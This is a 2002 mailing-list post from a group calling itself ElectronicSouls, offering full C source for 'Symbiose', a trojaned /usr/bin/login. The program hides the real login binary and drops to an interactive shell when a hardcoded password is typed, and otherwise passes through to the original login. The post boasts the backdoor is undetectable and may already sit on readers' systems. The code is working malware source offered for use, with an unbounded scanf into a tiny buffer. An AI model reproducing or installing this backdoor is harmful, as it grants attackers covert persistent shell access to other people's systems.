[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200211291645.gATGjYQl049023@mailserver3.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - New Backdoor Technique
-----BEGIN PGP SIGNED MESSAGE-----
Dear List,
Here's a backdoor we wrote a while ago that is 100% stealth and cannot
be detected. Be warned that such a backdoor may have been installed on
your system, as we are the Immortal Blackhats.
# cat symbsd.c
/*
* [ E l e c t r o n i c - S o u l s ]
*
* Symbiose - UNIX Deamon Backdoor
* (C) BrainStorm
*
* you have 1 second to enter the passwd,
* else it will execute the original deamon.
*
*/
#include<signal.h>
#include<stdio.h>
#include<string.h>
#include<unistd.h>
#define ORIGINAL "/usr/bin/.login" /* the new path of the original deamon execu
table. */
#define BACKDOOR "/usr/bin/login" /* u can also back door other deamons of cou
rse ;) */
#define PASS "es" /* u may want to change this password.. */
char **execute;
char passwd[3];
int main(int argc, char *argv[]) {
void connection();
signal(SIGALRM,connection);
alarm(3);
execute=argv;
*execute=BACKDOOR;
scanf("%s",passwd);
if(strcmp(passwd,PASS)==0) {
alarm(0);
printf(" ******************************************************************
\n");
printf(" ******************************************************************
\n");
printf("[ *** Welcome to Symbiose ;) -- (C) BrainStorm [ElectronicSouls] *** ]
\n");
printf(" ******************************************************************
\n");
printf(" ******************************************************************
\n\n");
execl("/bin/sh","/bin/sh","-i",0);
execv("id",execute);
exit(0);
}
else
{
execv(ORIGINAL,execute);
exit(0);
}
}
void connection()
{
execv(ORIGINAL,execute);
exit(0);
}
#
The Electronic Souls Crew
[ElectronicSouls] (c) 2002
"We don't know Latin."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlMEARECABMFAj3nmcEMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltRr4An0oFAwVWHvQF
D3Xz84s4c3PFwEkuAJoDkE+GhGc8QCZdV5Z/rwWl3LQH0w==
=0rBN
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
Powered by blists - more mailing lists